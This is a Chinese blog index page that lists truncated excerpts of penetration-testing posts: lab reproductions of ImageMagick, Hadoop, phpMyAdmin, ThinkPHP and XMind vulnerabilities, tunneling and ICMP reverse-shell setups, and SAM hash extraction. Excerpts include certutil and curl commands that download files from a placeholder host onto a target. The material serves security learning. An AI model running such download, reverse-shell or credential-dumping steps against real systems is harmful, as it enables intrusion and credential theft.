会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
铺哩
想成为伟大的动画渗透喵~
博客园
首页
新随笔
联系
管理
上一页
1
···
6
7
8
9
10
11
12
13
14
···
17
下一页
2021年9月7日
漏洞复现-imagemagick:6.9.2-命令执行
摘要: 0x00 实验环境 攻击机:Win 10 靶场:docker拉的vulhub靶场 0x01 影响版本 对版本低于6.9.3.9的ImageMagick有影响 0x02 漏洞复现 (1)新建一个图片,内容为: push graphic-context viewbox 0 0 640 480 fill
阅读全文
posted @ 2021-09-07 10:20 铺哩
阅读(486)
评论(0)
推荐(0)
2021年9月1日
ew+pingtunnel组合建立socks5隧道
摘要: 0x00 实验环境 攻击机:win(192.168.43.131)+kali(192.168.43.217) 受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)
阅读全文
posted @ 2021-09-01 11:05 铺哩
阅读(1019)
评论(0)
推荐(0)
2021年8月31日
利用ICMP隧道反弹shell
摘要: 利用ICMP隧道反弹shell (1)下载icmpsh: git clone https://github.com/bdamele/icmpsh.git (2)python安装类库python-impacket apt-get install python-impacket 注:必须下载安装pyth
阅读全文
posted @ 2021-08-31 11:04 铺哩
阅读(407)
评论(0)
推荐(0)
2021年8月30日
Pystinger Socks4a上线内网不出网主机
摘要: 文章参考:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw 0x01 工具及环境搭建 (1)下载pystinger (Release模块) https://github.com/FunnyWolf/pystinger (2)内网环境: 攻击机:192
阅读全文
posted @ 2021-08-30 17:05 铺哩
阅读(1103)
评论(0)
推荐(0)
2021年6月28日
漏洞复现-hadoop-命令执行
摘要: 0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 hadoop 3.3.0以下 vulhub版本为2.8.1: 0x02 漏洞复现 (1)访问/cluster/apps页面:(该页面存在说明存在未授权访问漏洞)
阅读全文
posted @ 2021-06-28 15:23 铺哩
阅读(4540)
评论(0)
推荐(0)
2021年6月7日
windows命令行远程下载文件的五种方法
摘要: 方法一: certutil -urlcache -split -f http://xx.xx.xx.xx/test.zip c:\test.zip (windows远程下载文件至本地,仅需要一个cmd执行的地方) 方法二: curl http://xx.xx.xx.xx/test.zip -o c:
阅读全文
posted @ 2021-06-07 16:03 铺哩
阅读(21199)
评论(1)
推荐(0)
2021年5月17日
Administrator导出hash
摘要: 一、sam特征 (1)全称: security account manager (2)存储位置: C:\windows\system32\config\SAM (3)一旦创建,即产生,一旦销毁,即消失,即使账号重复也将重新生成新的hash 二、提取sam密码 法一:提取命令:(win2K可以直接使用
阅读全文
posted @ 2021-05-17 10:37 铺哩
阅读(372)
评论(0)
推荐(0)
2021年5月11日
漏洞复现-Xmind-xss致命令执行
摘要: 0x00 实验环境 攻击机:Win 10 0x01 影响版本 官网windows最新版本:XMind-2020-for-Windows-64bit-10.3.1-202101070032 0x02 漏洞复现 (1)安装Xmind后,新建一个思维导图,然后点击大纲: (2)尝试XSS语句测试paylo
阅读全文
posted @ 2021-05-11 10:00 铺哩
阅读(542)
评论(0)
推荐(0)
2021年5月10日
漏洞复现-CVE-2016-5734-phpmyadmin后台代码执行
摘要: 0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:phpmyadmin 版本:php版本:4.3.0 ~5.4.6 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前
阅读全文
posted @ 2021-05-10 15:11 铺哩
阅读(1100)
评论(0)
推荐(0)
2021年4月19日
漏洞复现-thinkphp5.0-远程代码执行
摘要: 0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:/index.php 版本:thinkphp5.0~thinkphp5.0.23 0x02 漏洞复现 注:复现是比较简单的,原理需要自己去深入剖析 (1)
阅读全文
posted @ 2021-04-19 08:31 铺哩
阅读(363)
评论(0)
推荐(0)
上一页
1
···
6
7
8
9
10
11
12
13
14
···
17
下一页